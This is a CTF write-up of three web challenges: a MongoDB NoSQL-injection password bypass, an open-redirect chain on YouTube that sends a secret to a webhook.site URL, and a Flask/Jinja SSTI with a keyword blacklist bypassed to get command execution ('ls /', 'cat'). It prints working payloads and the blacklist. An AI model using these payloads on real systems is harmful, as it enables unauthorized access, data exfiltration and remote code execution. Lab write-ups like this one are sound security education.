# Web Exploitation | Name | Solves | | --------------------------------------- | ------ | | Ingfokan Lokasi Takjil :first\_place: | 52 | | Redirection | 28 | | TobTobiTobTobTobiTobTobTobiTobTobTobali | 24 | ## Ingfokan Lokasi Takjil ### Description > Author: **Max The Computer Fox** > > Max dan teman teman nya sedang berencana untuk mencari takjil sebanyak mungkin untuk entar dimakan bersama saat buka nanti, tetapi mereka harus cepat sebelum takjil takjil yang di jual habis. Merekapun membuat platform untuk membagikan lokasi lokasi takjil yang dapat mereka kunjungi secara privat, apakah anda dapat menemukan vulnerabilitas di platform mereka untuk mencari lokasi takjil favorit Max? > > Connect: ### Initial Analysis We are given a website:

There's one post, that is password protected at

### Source Code Analysis We are given a source code file, the directory tree is like this: ```sh ┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Ingfokan Lokasi Takjil] └──╼ $tree . . ├── app.py ├── docker-compose.yml ├── Dockerfile ├── flag.txt ├── requirements.txt ├── setup.py ├── static │ ├── favicon.ico │ ├── max.gif │ ├── max_letsgocaritakjil.png │ └── static.css └── templates ├── error.html ├── index.html ├── lokasi.html └── password.html 3 directories, 14 files ``` We can conclude that this is a python web app. We take a look at `app.py` {% code title="app.py" %} ```python from flask import Flask, render_template, redirect, url_for, request from pymongo import MongoClient from bson.objectid import ObjectId import json import os client = MongoClient(os.environ.get('MONGODB_URI')) # client = MongoClient("mongodb://localhost:27017") db = client['database'] post_collection = db["posts"] config = db["config"] # check if the program has already been setup is_installed = config.find_one({"installed": True}) if is_installed is None: # if not, run setup.py os.system("python setup.py") app = Flask(__name__) @app.route('/') def main(): # grab all posts and only show their id, title, and author posts = db["posts"].find({}) posts_data = list() for post in posts: posts_data.append([str(post['_id']), post["title"], post["author"]]) print(posts_data) return render_template("index.html", postdata=posts_data) @app.route('/post/', methods=['GET', 'POST']) def post(id): post = db["posts"].find_one({"_id": ObjectId(id)}) page = render_template( "lokasi.html", title=post["title"], author=post["author"], note=post["note"], location=post["location"] ) if request.method == "POST": password = request.form['password'] # ini tadi buat apa yah? -Max if password.startswith("{") and password.endswith("}"): password = json.loads(password) posts = db["posts"].find_one({ "_id": ObjectId(id), "password": password }) if posts: return page else: return render_template("password.html", message="Incorrect password") if post["password"]: return render_template("password.html") return page # favicon @app.route('/favicon.ico') def favicon(): return redirect(url_for('static', filename='favicon.ico')) # make a default for unknown pages 404 @app.errorhandler(404) def page_not_found(e): return render_template("error.html", errorcode=404, errormessage="Page not found") # make a default for 500 internal server error @app.errorhandler(500) def internal_server_error(e): return render_template("error.html", errorcode=a500, errormessage="Internal server error") if __name__ == "__main__": app.run(host='0.0.0.0', port=5000) ``` {% endcode %} There's an interesting piece of code here: ```python # ini tadi buat apa yah? -Max if password.startswith("{") and password.endswith("}"): password = json.loads(password) ``` It basically checks if the password in a JSON format, it will serialize it into a JSON object. Then it will pass it into this code: ```python posts = db["posts"].find_one({ "_id": ObjectId(id), "password": password }) ``` ### Exploitation Since the app used MongoDB as its database, this piece of code is vulnerable to NoSQL Injection. {% embed url="" %} Read more here {% endembed %} Basically we can use a JSON object to inject the MongoDB query to this: ```python posts = db["posts"].find_one({ "_id": ObjectId(id), "password": {"$ne": "bukanrilpassword"} }) ``` This will make the MongoDB queried `password ≠ "bukanrilpassword".` Since the password is obviously not "bukanrilpassword". This query injection passes the checks, returns true, and we get the flag. Thus, the payload is: ``` {"$ne": "bukanrilpassword"} ``` We put this into the password field and we got the flag!

{% hint style="success" %} Flag: **RAMADAN{T4kj1lnya\_K3mana\_Ab4ngkuh}** {% endhint %} ## Redirection ### Description > Author: **dimas** > > Can you do open redirection on youtube? > > Connect: ### Initial Analysis We are given a website:

Nothing interesting. ### Source Code Analysis We are given a single source code: {% code title="app.py" %} ```python from flask import Flask, request import requests import re import os app = Flask(__name__) FLAG = os.environ.get("FLAG", "fake{flag}") @app.get("/") def home(): url = request.args.get("url", False) if not url: return "Url not found" if not re.match(r"^https://youtube.com/.*$", url): return "url isn't youtube url" response = requests.get(url+"?"+FLAG) return response.text if __name__ == "__main__": app.run("0.0.0.0", 8080, debug=False) ``` {% endcode %} This code basically will redirect, **only** if the URL supplied, passes this regex: ``` r"^https://youtube.com/.*$" ``` And to get the flag, we need to control where it redirects to get the FLAG parameter. Thus we need an Open Redirect Vulnerability on YouTube. {% embed url="" %} ### Exploitation After looking for a while, there's apparently an Open Redirect vulnerability on YouTube. Based on this writeup: {% embed url="" %}

So i used the first payload, adjusted it to my webhook, and it apparently worked😂. ```url http://playground.tcp1p.team:16787/?url=https://youtube.com/logout?continue=http%3A%2F%2Fgoogleads%2Eg%2Edoubleclick%2Enet%2Fpcs%2Fclick%3Fadurl%3Dhttps%3A%2F%2Fwebhook%2Esite%2F6ba4fbc6%2D1aed%2D4251%2D8cb2%2D2639d53ffa2b%3FFLAG ```

{% hint style="success" %} Flag: **RAMADAN{open\_redirection\_on\_youtube\_is\_really\_handy}** {% endhint %} ## TobTobiTobTobTobiTobTobTobiTobTobTobali ### Description > Author: **DJumanto** > > Cat Tobitob decided to make a gift card page, so you can say "Happy ramadhan", to your relatives :D > > Connect: ### Initial Analysis We are given a website:

And if we input something, our input gets reflected.

### Source Code Analysis We are given a source code, the directory tree looks like this: ```sh ┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/TobTobiTobTobTobiTobTobTobiTobTobTobali] └──╼ $tree . . ├── app.py ├── docker-compose.yml ├── Dockerfile ├── flag.txt ├── requirements.txt ├── static │ └── cat.jpg └── templates └── index.htmlap 3 directories, 8 files ``` Looking at the `app.py` file: {% code title="app.py" %} ```python from flask import Flask, request, render_template_string, send_from_directory app = Flask(__name__, static_folder='static') blacklists =['os', 'sys', 'import','subprocess', 'shutil', 'tempfile', 'pickle', 'marshal', 'write', 'eval', 'exec', 'system', 'popen', 'open', 'call', 'check_output', 'check_call', 'startfile', 'remove', 'unlink', 'rmdir', 'remove', 'rename', 'replace', 'chdir', 'chmod', 'chown', 'chroot', 'link', 'lchown', 'listdir', 'lstat', 'mkdir', 'makedirs', 'mkfifo', 'mknod', 'open', 'openpty', 'remove', 'removedirs', 'rename', 'renames', 'rmdir', 'stat', 'symlink', 'unlink', 'walk', 'write', 'popen', 'builtins', 'global'] @app.route('/static/') def static_file(filename): return send_from_directory(app.static_folder, filename) @app.route('/') def index(): return render_template_string(open('templates/index.html').read()) @app.route('/card', methods=['POST']) def card(): name = request.form.get('name', 'tobi') lname = name.lower() if any(word in lname for word in blacklists): return "TobiTob don't like that" style=''' ''' template = ''' TobTobiTobTobTobiTobTobTobiTobTobTobali {}

Hello {}

Hope you have a good Ramadhan

'''.format(style,name) return render_template_string(template) if __name__ == '__main__': app.run(host="0.0.0.0", port=5000, debug=False) ``` {% endcode %} We can see there's a vulnerability at this line: ```python def index(): return render_template_string(open('templates/index.html').read()) ``` The `render_template_string`function is vulnerable to SSTI (Server Side Template Injection). And since we can control what is passed to the template here: ```html

Hello {}

<-- Controlled by user input cat

Hope you have a good Ramadhan

``` We can just use the template syntax to get RCE. {% embed url="" %} To confirm our theory, we can inject simple payload like `{{ 7 * 7 }}` and see if it returns 49.

### Exploitation There are several functions that we cannot use, defined by this array: ```python blacklists =['os', 'sys', 'import','subprocess', 'shutil', 'tempfile', 'pickle', 'marshal', 'write', 'eval', 'exec', 'system', 'popen', 'open', 'call', 'check_output', 'check_call', 'startfile', 'remove', 'unlink', 'rmdir', 'remove', 'rename', 'replace', 'chdir', 'chmod', 'chown', 'chroot', 'link', 'lchown', 'listdir', 'lstat', 'mkdir', 'makedirs', 'mkfifo', 'mknod', 'open', 'openpty', 'remove', 'removedirs', 'rename', 'renames', 'rmdir', 'stat', 'symlink', 'unlink', 'walk', 'write', 'popen', 'builtins', 'global'] ``` We can use one of the payloads from HackTricks and adjust them: {% embed url="" %} We can see the provided `` by using this payload: ```python {{ ''.__class__.__mro__[1].__subclasses__() }} ```

Since our flag name is randomized, we need a class where we can do code execution to execute `ls`and `cat` . There is `` class to do just that at index 370. In the end i used this payload: ```python {{ (''.__class__.__mro__[1].__subclasses__()[370])('ls /', shell=True, stdout=-1).communicate() }} ```

And since we know the flag file name, we can read it with this payload: {% code overflow="wrap" %} ```python {{ (''.__class__.__mro__[1].__subclasses__()[370])('cat /bb53fee07051cb63.txt', shell=True, stdout=-1).communicate() }} ``` {% endcode %}

{% hint style="success" %} Flag: **RAMADAN{"Setor\_Hafalan\_Dulu\_Gak\_Sih\_TobTobiTobTobTobiTobTobTobiTobTobTobaliXD"}** {% endhint %}